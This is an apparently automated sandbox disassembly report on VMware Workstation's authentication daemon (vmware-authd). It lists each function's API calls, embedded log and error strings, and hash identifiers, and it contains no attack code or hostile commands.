String ID: OpenSCManager failed: %s (%d)$OpenService(%s) failed: %s (%d)$QueryServiceStatus failed: %s (%d)$StartService(%s) failed: %s (%d)$VMAuthdStartService failed to lookup service tag: %s$VMAuthdStartService failed to start service %s: Expected service state %d, got %d$WaitForServiceStateChange failed: Timed out while waiting for service state to change from %d
API String ID: 91289074-1392791404
Opcode ID: a875bee718774a2d702481fc122bc0613ee867cdd606111caf5e4c2e1e2f662e
Instruction ID: 2439caf84e4c942e63928b5ab40297bee9a873ffa5aca465feadc3ee48997dbd
Opcode Fuzzy Hash: a875bee718774a2d702481fc122bc0613ee867cdd606111caf5e4c2e1e2f662e
Instruction Fuzzy Hash: 42612732A00604ABDB10BFA49C85ABF77B9EB4A304F540C6BFD05A7341D739DD019B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00484B50 Relevance: 35.1, APIs: 14, Strings: 6, Instructions: 144networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000002,00000001,00000000), ref: 00484B9A
setsockopt.WS2_32(00000000,0000FFFF,00000004,FFFFFFFF,00000004), ref: 00484BC6
WSAGetLastError.WS2_32(?,?,?,?,00484575,00000014,00000001,?), ref: 00484BD1
htonl.WS2_32(00000000), ref: 00484BF2
htons.WS2_32(00000000), ref: 00484BFF
bind.WS2_32(00000000,00484575,00000010), ref: 00484C10
WSAGetLastError.WS2_32(?,?,?,?,00484575,00000014,00000001,?), ref: 00484C35
CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00484575,00000014,00000001,?), ref: 00484C55
GetLastError.KERNEL32(?,?,?,?,00484575,00000014,00000001,?), ref: 00484C61

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

WSAEventSelect.WS2_32(00000000,00000000,00000008), ref: 00484C7D
WSAGetLastError.WS2_32(?,?,?,?,00484575,00000014,00000001,?), ref: 00484C88
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00484575,00000014,00000001,?), ref: 00484C9F
closesocket.WS2_32(00000000), ref: 00484CB0

Strings

Call to CreateEvent failed with error %d., xrefs: 00484C68
Call to bind failed with error %d., xrefs: 00484C1B, 00484C3C
Call to listen failed with error %d., xrefs: 00484C30
Call to setsockopt failed with error %d., xrefs: 00484BD8
WSAEventSelect failed with error %d., xrefs: 00484C8F
Call to socket failed with error %d., xrefs: 00484BA7

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: ErrorLast$EventWarning$CloseCreateHandleSelect_printfbindclosesockethtonlhtonssetsockoptsocket
String ID: Call to CreateEvent failed with error %d.$Call to bind failed with error %d.$Call to listen failed with error %d.$Call to setsockopt failed with error %d.$Call to socket failed with error %d.$WSAEventSelect failed with error %d.
API String ID: 3009708719-439827924
Opcode ID: d422c46aa3fe44d1903d5db81995a89f43679e3de7cd1826975fd2e8d31960f7
Instruction ID: df331a327ffd0661dd5a7021a8f93777c64106949a2e8c7691b6f0a35d863358
Opcode Fuzzy Hash: d422c46aa3fe44d1903d5db81995a89f43679e3de7cd1826975fd2e8d31960f7
Instruction Fuzzy Hash: 6B411B30A00205AFE710BFB59C49BAE7768EF55724F100A2BFB14DB2D1D7B84840875A

Uniqueness

Uniqueness Score: -1.00%

Function 00483360 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 176COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(%s: Pathname too long: %s,VMAuthdPermissionsCheck,00000000,?,?,?,00482584,00000000,?,?,00000000,00000000,?,?), ref: 0048338F
Warning.VMWAREBASE(?,00000000,00000104,00000000,00000000,?,?,?,00482584,00000000,?,?,00000000,00000000,?,?), ref: 004833CE
ImpersonateLoggedOnUser.ADVAPI32(?,00000000,?,?), ref: 004833E3
GetLastError.KERNEL32 ref: 004833ED

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

Warning.VMWAREBASE(?,00000000,00000000,?,?), ref: 00483428
ImpersonateLoggedOnUser.ADVAPI32(?,?,?,00000000,?,?), ref: 0048344D
GetLastError.KERNEL32(?,?,00000000,?,?), ref: 00483457
Warning.VMWAREBASE(00000000,00120089,?,?,?,00000000,?,?), ref: 00483479
ImpersonateLoggedOnUser.ADVAPI32(?), ref: 004834C6
GetLastError.KERNEL32 ref: 004834D0
Warning.VMWAREBASE(00000000,001200A0,?), ref: 004834F2

Part of subcall function 00486EA0: RevertToSelf.ADVAPI32(004835D3,?,?,?,?,?,?,?,ha-nfcssl), ref: 00486E80

Strings

VMAuthdPermissionsCheck, xrefs: 00483385
VMware Server Console, xrefs: 00483495, 0048350E
Config file not found: %s, xrefs: 00483404
You need execute access in order to connect with the %s. Access denied for config file: %s, xrefs: 00483513
Failed to impersonate logged on user (error %d)., xrefs: 004833F4, 0048345E, 004834D7
You need read access in order to connect with the %s. Access denied for config file: %s, xrefs: 0048349A
Invalid pathname (too long), xrefs: 00483394
%s: Pathname too long: %s, xrefs: 0048338A

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$ImpersonateLoggedUser$RevertSelf_printf
String ID: %s: Pathname too long: %s$Config file not found: %s$Failed to impersonate logged on user (error %d).$Invalid pathname (too long)$VMAuthdPermissionsCheck$VMware Server Console$You need execute access in order to connect with the %s. Access denied for config file: %s$You need read access in order to connect with the %s. Access denied for config file: %s
API String ID: 3502866025-2643214048
Opcode ID: 34221f859ac34a12466d387a9669488f01463ea37c06099d5c2a467ed4c026b7
Instruction ID: 850a778586bac8de70f9b1b835f24a1c1f3f9c752ed2a973c62798941f640367
Opcode Fuzzy Hash: 34221f859ac34a12466d387a9669488f01463ea37c06099d5c2a467ed4c026b7
Instruction Fuzzy Hash: 49412A71A452003AE6217F65AC06B7FBB18DF12F1AF040E9BFD04662D3E6995A1143EE

Uniqueness

Uniqueness Score: -1.00%

Function 00482450 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 9COMMON

Download Yara Rule

APIs

_printf.MSPDB140-MSVCRT ref: 00482468

Part of subcall function 004826C0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,00000000,?,00482829,0048A850,?,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004826C9
Part of subcall function 004826C0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,0048A850,00000000,?,?,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 004826E4

Strings

%s Authentication Daemon Version %u.%u for %s %s, xrefs: 00482463
VMware Workstation, xrefs: 00482455
17.0.0 build-20800274, xrefs: 00482450
VMware, xrefs: 0048245E

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf_printf
String ID: %s Authentication Daemon Version %u.%u for %s %s$17.0.0 build-20800274$VMware$VMware Workstation
API String ID: 1378652321-2909783590
Opcode ID: b5237b9dd5f4c43704f417c6764b683e40ba3787f5d9ad4710862b47a015b48d
Instruction ID: f4c14f4f62fa0240ccaa1393e884f1028b6d5d3ee9f84edab2919e34a2c48b53
Opcode Fuzzy Hash: b5237b9dd5f4c43704f417c6764b683e40ba3787f5d9ad4710862b47a015b48d
Instruction Fuzzy Hash: 6CB04864BC07052AE82035000C43F0D10409322F0AEF008533210381E261CD106102AE

Uniqueness

Uniqueness Score: -1.00%

Function 00482850 Relevance: 71.9, APIs: 31, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,?,00000000,00000000,?,0048269A), ref: 00482864
Warning.VMWAREBASE(?,?,00000000,00000000,?,0048269A), ref: 00482871
Warning.VMWAREBASE(00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0048269A), ref: 00482887
Warning.VMWAREBASE(00000000,00000003,log.syslogMinLevel,00000000,vmauthd,log.syslogID,?,?,00000000,00000000,?,0048269A), ref: 00482894
Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 0048289C
Warning.VMWAREBASE(?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828A3
Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828A9
Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828AF
Warning.VMWAREBASE(00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828B5
Warning.VMWAREBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000,00000000,?,0048269A), ref: 004828BB
Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004828C7
Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?), ref: 004828D2
Warning.VMWAREBASE(?,00000000,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 004828E7
Warning.VMWAREBASE(00000000,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 004828F6
Warning.VMWAREBASE(00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 00482910
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,%s\%s,00000000,vmauthd.log,?,?,vmauthd.log.fileName,?,?,00000000,00000000,?,0048269A), ref: 00482918
Warning.VMWAREBASE(?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 0048292B
Warning.VMWAREBASE(00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482939
Warning.VMWAREBASE(00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482949
Warning.VMWAREBASE(00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 00482956
Warning.VMWAREBASE(00000000,00000003,log.logMinLevel,00000000,00000001,log.systemAreaTemp,00000000,vmauthd,log.suffix,00000000,00000000,log.fileName,?,vmauthd.log.fileName,?,?), ref: 00482963
Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 0048296B
Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName,?,?), ref: 00482972
Warning.VMWAREBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 00482978
Warning.VMWAREBASE(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,vmauthd.log.fileName), ref: 0048297E
Warning.VMWAREBASE(00000000,00000000,00000000), ref: 00482984
Warning.VMWAREBASE(00000000,00000000,00000000,00000000), ref: 0048298A
Warning.VMWAREBASE(vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482998
Warning.VMWAREBASE(00000000,vmauthd,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0048299E
Warning.VMWAREBASE(00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 004829AA
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000000,000000FF,?,vmauthd.log.fileName,?,?,00000000,00000000), ref: 004829B0

Strings

vmauthd.log.fileName, xrefs: 004828DC
vmauthd.log, xrefs: 00482904
log.logMinLevel, xrefs: 0048295B
log.syslogMinLevel, xrefs: 0048288C
log.syslogID, xrefs: 0048287C
log.systemAreaTemp, xrefs: 0048294E
log.suffix, xrefs: 0048293E
vmauthd, xrefs: 0048285F, 00482881, 004828C2, 00482943, 00482993
log.fileName, xrefs: 00482930
%s\%s, xrefs: 0048290A

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$free
String ID: %s\%s$log.fileName$log.logMinLevel$log.suffix$log.syslogID$log.syslogMinLevel$log.systemAreaTemp$vmauthd$vmauthd.log$vmauthd.log.fileName
API String ID: 2642810717-3249989834
Opcode ID: 25b4241dffd158a129355cf71e9483ea1df2c16ba6255bb6b39d6173d3004264
Instruction ID: a6aaf2a5f2ecd09d11672d5b41c55b75fd1339a55ca24d26d2ec8f397c2cfc08
Opcode Fuzzy Hash: 25b4241dffd158a129355cf71e9483ea1df2c16ba6255bb6b39d6173d3004264
Instruction Fuzzy Hash: 903182A0A48B0435EA1136F60C8BF7F255C8F51F99F184D2FF94576283EAAD4D1243AD

Uniqueness

Uniqueness Score: -1.00%

Function 00483710 Relevance: 40.4, APIs: 6, Strings: 17, Instructions: 194synchronizationnetworkCOMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,?,00000001,?,00000000,004813A6), ref: 0048377C
WSAGetLastError.WS2_32(?,00000000,004813A6,?,?,?,?,?,?,?,?,?,?,?,?,ha-nfcssl), ref: 00483787
WaitForSingleObject.KERNEL32(?,?,?,00000000,004813A6), ref: 004837A8
Warning.VMWAREBASE(?,?,UTF-8,?,00000000,004813A6), ref: 004838A0

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

Part of subcall function 00482780: Warning.VMWAREBASE(?,000000FF,00000000,00000000,?,004838C9,Data not in UTF-8 format,?,00000003,Line is not in UTF-8. Disconnecting,?,00000000,004813A6), ref: 0048278B
Part of subcall function 00482780: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000005,Data dump: %s,00000000,00000005,%s,00000003,?,000000FF,00000000,00000000,?,004838C9,Data not in UTF-8 format,?,00000003), ref: 004827AF

Warning.VMWAREBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004813A6), ref: 004838FC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,004813A6), ref: 00483919

Strings

recv timed-out waiting for data on connection. aborting., xrefs: 004837FB
recv() FAIL: %d., xrefs: 00483810
VMAuthdSocketRead, xrefs: 004838DD, 00483972
Input not in UTF-8 encoding., xrefs: 004838C9
Line missing \r, xrefs: 00483872
Buffer full. Disconnecting., xrefs: 004837D8
Input incorrectly terminated., xrefs: 0048387C
%s: read failed. Closing socket for reading., xrefs: 004838E2
%s(): reading from closed socket., xrefs: 00483977
Line is not in UTF-8. Disconnecting, xrefs: 004838B0
Data not in UTF-8 format, xrefs: 004838BF
Short response (%d). Disconnecting., xrefs: 00483831
Overflowed buffer, xrefs: 004837E7
Read a \n without a corresponding \r. Disconnecting., xrefs: 0048385F
UTF-8, xrefs: 00483899
Input too large., xrefs: 004837F1
Input incorrectly terminated., xrefs: 00483840

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$CloseHandleObjectSingleWait_printffree
String ID: %s(): reading from closed socket.$%s: read failed. Closing socket for reading.$Buffer full. Disconnecting.$Data not in UTF-8 format$Input incorrectly terminated.$Input incorrectly terminated.$Input not in UTF-8 encoding.$Input too large.$Line is not in UTF-8. Disconnecting$Line missing \r$Overflowed buffer$Read a \n without a corresponding \r. Disconnecting.$Short response (%d). Disconnecting.$UTF-8$VMAuthdSocketRead$recv timed-out waiting for data on connection. aborting.$recv() FAIL: %d.
API String ID: 974896413-2831141954
Opcode ID: 17bd38aec82ff778ef4946b067813ed19ae3887d2609f6e4939afed339f4c97b
Instruction ID: 19a88c5868d31fe6e6edf0285711c2be011eb4af43ed5631d21418ee6e44bede
Opcode Fuzzy Hash: 17bd38aec82ff778ef4946b067813ed19ae3887d2609f6e4939afed339f4c97b
Instruction Fuzzy Hash: 4D611470A40205ABDB20BF758C03BAEB7A0EF00F19F104D6FF955962D2D7B85A0587AD

Uniqueness

Uniqueness Score: -1.00%

Function 00483C70 Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 97threadpipeCOMMON

Download Yara Rule

APIs

ImpersonateNamedPipeClient.ADVAPI32(?), ref: 00483C9F
GetLastError.KERNEL32 ref: 00483CA9
Warning.VMWAREBASE(00000000), ref: 00483CB0
Warning.VMWAREBASE(?,?,ImpersonateNamePipeClient failed: %s (%d) ,00000000,00000000), ref: 00483CBF
memset.VCRUNTIME140(?,00000000,00000400), ref: 00483CDA
Warning.VMWAREBASE(?,?,?,00000000,00000400), ref: 00483CF7
GetLastError.KERNEL32 ref: 00483D03
Warning.VMWAREBASE(Failed to obtain username: %d,00000000), ref: 00483D0F
GetCurrentThread.KERNEL32 ref: 00483D38
OpenThreadToken.ADVAPI32(00000000), ref: 00483D3F
GetLastError.KERNEL32 ref: 00483D49
Warning.VMWAREBASE(00000000), ref: 00483D50
Warning.VMWAREBASE(?,?,DuplicateTokenEx failed: %s (%d) ,00000000,00000000), ref: 00483D95
CloseHandle.KERNEL32(FFFFFFFF), ref: 00483DAF

Strings

Failed to obtain username: %d, xrefs: 00483D0A
ImpersonateNamePipeClient failed: %s (%d) , xrefs: 00483CB6
OpenThreadToken failed: %s (%d) , xrefs: 00483D56
Username associated with named pipe: %s, xrefs: 00483D1D
DuplicateTokenEx failed: %s (%d) , xrefs: 00483D8C

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$ErrorLast$Thread$ClientCloseCurrentHandleImpersonateNamedOpenPipeTokenmemset
String ID: DuplicateTokenEx failed: %s (%d) $Failed to obtain username: %d$ImpersonateNamePipeClient failed: %s (%d) $OpenThreadToken failed: %s (%d) $Username associated with named pipe: %s
API String ID: 3019834010-2777213736
Opcode ID: 8a8f95b18d3f07a34552e988dca337f1a303f142b9091618df553835d19a2079
Instruction ID: 705ba2c92f951818eeeff3627bce02d0c80a63e7c784c9f0d468d7ebe7ba00a0
Opcode Fuzzy Hash: 8a8f95b18d3f07a34552e988dca337f1a303f142b9091618df553835d19a2079
Instruction Fuzzy Hash: 1E31BDB1500208ABDB10FF64CC09FAE736CAF05709F440DABBB14E2191D7789E555B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00481440 Relevance: 37.0, APIs: 10, Strings: 11, Instructions: 243COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(?,InSeCuRe), ref: 00481499
memset.VCRUNTIME140(?,00000000,?), ref: 004814B5

Part of subcall function 00483B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00483B96

Strings

Login incorrect., xrefs: 004816E6
Password not understood., xrefs: 004814C1
InSeCuRe, xrefs: 00481493
VUUU, xrefs: 004816AD
User %s logged in., xrefs: 00481614
Ticket does not specify a socketName, xrefs: 0048157E
LOGIN FAILURE from %.128s, %s, xrefs: 00481657
Login with USER first., xrefs: 00481466
No ticket found, xrefs: 0048154A
Ticket found: cfg=%s socket=%s, xrefs: 004815BB
Ticket does not specify a cfgFile, xrefs: 00481564

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning$memset
String ID: InSeCuRe$LOGIN FAILURE from %.128s, %s$Login incorrect.$Login with USER first.$No ticket found$Password not understood.$Ticket does not specify a cfgFile$Ticket does not specify a socketName$Ticket found: cfg=%s socket=%s$User %s logged in.$VUUU
API String ID: 3890564892-1759344295
Opcode ID: 6c58e618f2fced89cefab91056079998e5227649d8fa32caad1a2c3a78ddcdc3
Instruction ID: 9f5286fd512f1ce51a080273c20c47325d9df50ba58bba2dabfc0e09c1142b5f
Opcode Fuzzy Hash: 6c58e618f2fced89cefab91056079998e5227649d8fa32caad1a2c3a78ddcdc3
Instruction Fuzzy Hash: 5D817B31A001056BCB10FF64DC42BAF77A8DB45704F0448BBED0ACB292EE799A15C799

Uniqueness

Uniqueness Score: -1.00%

Function 00481260 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(Received PROXY command for %s, session = %s,?,?), ref: 00481282
Warning.VMWAREBASE(%s: routing vpxa NFC connection to hostd.,VMAuthdPROXYCommand), ref: 004812C9
Warning.VMWAREBASE(%s: routing vpxa NFC SSL connection to hostd.,VMAuthdPROXYCommand), ref: 00481318

Strings

VMAuthdPROXYCommand, xrefs: 004812BA, 00481309
vpxa-nfcssl, xrefs: 004812D6
Received PROXY command for %s, session = %s, xrefs: 0048127D
nfc, xrefs: 00481322
nfcssl, xrefs: 00481360
vpxa-nfc, xrefs: 0048128A
%s: routing vpxa NFC connection to hostd., xrefs: 004812BF
vmware-hostd, xrefs: 0048139C
PROXY service %s not found., xrefs: 004813B3
%s: routing vpxa NFC SSL connection to hostd., xrefs: 0048130E
ha-nfc, xrefs: 004812C4, 00481359
ha-nfcssl, xrefs: 00481313, 00481390, 0048139B

Memory Dump Source

Source File: 00000004.00000002.3262863874.0000000000481000.00000020.00000001.01000000.00000008.sdmp, Offset: 00480000, based on PE: true

Associated: 00000004.00000002.3262818881.0000000000480000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.3262954677.0000000000492000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_vmware-authd.jbxd

Similarity

API ID: Warning
String ID: %s: routing vpxa NFC SSL connection to hostd.$%s: routing vpxa NFC connection to hostd.$PROXY service %s not found.$Received PROXY command for %s, session = %s$VMAuthdPROXYCommand$ha-nfc$ha-nfcssl$nfc$nfcssl$vmware-hostd$vpxa-nfc$vpxa-nfcssl
API String ID: 2415109466-2929834238
Opcode ID: 16a350988a9729f725abdd2e5f813f941eb8d1fc33ec54ed6e6ab5ed7ad93fbe
Instruction ID: 11a219c14e9be1392357dfa8b71a55b2a55335679f074b54a9ab1f2840a35b21
Opcode Fuzzy Hash: 16a350988a9729f725abdd2e5f813f941eb8d1fc33ec54ed6e6ab5ed7ad93fbe
Instruction Fuzzy Hash: 28410851A0818016E7113B345892BBF2B5B8B27784B5D0CE3DD86DBB62E24FDC1A835E

Uniqueness

Uniqueness Score: -1.00%

Function 00486510 Relevance: 23.0, APIs: 7, Strings: 6, Instructions: 279COMMON

Download Yara Rule

APIs

Warning.VMWAREBASE(00000002,00000000,?,00000000,?,00486AB7,00000000,00000000,00000000,?,00000000), ref: 004865D9
wcschr.VCRUNTIME140(00000000,0000003D,00000000), ref: 00486624
wcschr.VCRUNTIME140(00000000,0000003D,?,?,?,?,?,?,?,00000000), ref: 0048664B
CompareStringOrdinal.KERNEL32(00000000,?,00000000,00000000,00000001,?,?,?,?,?,?,?,00000000), ref: 00486672
CompareStringOrdinal.KERNEL32(00000000,000000FF,00000000,?,00000001,?,?,?,?,?,00000000), ref: 004866CD
memcpy.VCRUNTIME140(00000000,00000000,-00000001,?,?,00000000), ref: 0048676B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000000), ref: 004867D6

Part of subcall function 004827C0: GetLastError.KERNEL32(?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827D8
Part of subcall function 004827C0: Warning.VMWAREBASE(?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 004827F3
Part of subcall function 004827C0: Warning.VMWAREBASE(?,0048A850,?,?,00001000,?,00000005,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?), ref: 00482807
Part of subcall function 004827C0: _printf.MSPDB140-MSVCRT ref: 00482824
Part of subcall function 004827C0: SetLastError.KERNEL32(00000000,?,?,00483B4C,00000005,%s(): writing to closed socket: %s.,VMAuthdSocketWrite,?,?,?,?), ref: 0048282D

Strings

Failed comparing system vs user environment keys: %S vs %S. Please fix the environment blocks and try again., xrefs: 00486796
The child environment block is too long. Please fix your environment block and try again., xrefs: 004865AE
The system environment block is too long. Please fix your environment block and try again., xrefs: 00486556
The system environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 0048678D
Failed comparing a key against user environment keys: %S vs %S. Please fix your environment block and try again., xrefs: 004867AB
Your environment block appears to be corrupted (malformed key=value: %S). Please fix your environment block and try again., xrefs: 004867BF

Memory Dump Source

